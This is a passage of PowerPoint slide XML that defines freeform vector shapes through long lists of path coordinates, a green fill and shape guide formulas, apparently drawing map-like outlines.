                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="89"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="135" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="89"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="228"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="312" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="228"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="360" y="224"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="358" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="224"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="440" y="222"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="436" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="222"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="682" y="225"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="674" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="685" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="225"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="499" y="150"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="496" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="150"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="564" y="150"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="561" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="544" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="150"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36311" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4819" y="2952"/>
                <a:ext cx="157" cy="139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 153 w 157"/>
                  <a:gd name="T1" fmla="*/ 99 h 139"/>
                  <a:gd name="T2" fmla="*/ 157 w 157"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 141 w 157"/>
                  <a:gd name="T5" fmla="*/ 122 h 139"/>
                  <a:gd name="T6" fmla="*/ 127 w 157"/>
                  <a:gd name="T7" fmla="*/ 124 h 139"/>
                  <a:gd name="T8" fmla="*/ 128 w 157"/>
                  <a:gd name="T9" fmla="*/ 116 h 139"/>
                  <a:gd name="T10" fmla="*/ 120 w 157"/>
                  <a:gd name="T11" fmla="*/ 105 h 139"/>
                  <a:gd name="T12" fmla="*/ 125 w 157"/>
                  <a:gd name="T13" fmla="*/ 104 h 139"/>
                  <a:gd name="T14" fmla="*/ 119 w 157"/>
                  <a:gd name="T15" fmla="*/ 97 h 139"/>
                  <a:gd name="T16" fmla="*/ 107 w 157"/>
                  <a:gd name="T17" fmla="*/ 78 h 139"/>
                  <a:gd name="T18" fmla="*/ 96 w 157"/>
                  <a:gd name="T19" fmla="*/ 71 h 139"/>
                  <a:gd name="T20" fmla="*/ 68 w 157"/>
                  <a:gd name="T21" fmla="*/ 64 h 139"/>
                  <a:gd name="T22" fmla="*/ 59 w 157"/>
                  <a:gd name="T23" fmla="*/ 57 h 139"/>
                  <a:gd name="T24" fmla="*/ 53 w 157"/>
                  <a:gd name="T25" fmla="*/ 56 h 139"/>
                  <a:gd name="T26" fmla="*/ 44 w 157"/>
                  <a:gd name="T27" fmla="*/ 51 h 139"/>
                  <a:gd name="T28" fmla="*/ 42 w 157"/>
                  <a:gd name="T29" fmla="*/ 42 h 139"/>
                  <a:gd name="T30" fmla="*/ 38 w 157"/>
                  <a:gd name="T31" fmla="*/ 50 h 139"/>
                  <a:gd name="T32" fmla="*/ 29 w 157"/>
                  <a:gd name="T33" fmla="*/ 59 h 139"/>
                  <a:gd name="T34" fmla="*/ 26 w 157"/>
                  <a:gd name="T35" fmla="*/ 52 h 139"/>
                  <a:gd name="T36" fmla="*/ 26 w 157"/>
                  <a:gd name="T37" fmla="*/ 45 h 139"/>
                  <a:gd name="T38" fmla="*/ 15 w 157"/>
                  <a:gd name="T39" fmla="*/ 39 h 139"/>
                  <a:gd name="T40" fmla="*/ 18 w 157"/>
                  <a:gd name="T41" fmla="*/ 36 h 139"/>
                  <a:gd name="T42" fmla="*/ 26 w 157"/>
                  <a:gd name="T43" fmla="*/ 38 h 139"/>
                  <a:gd name="T44" fmla="*/ 33 w 157"/>
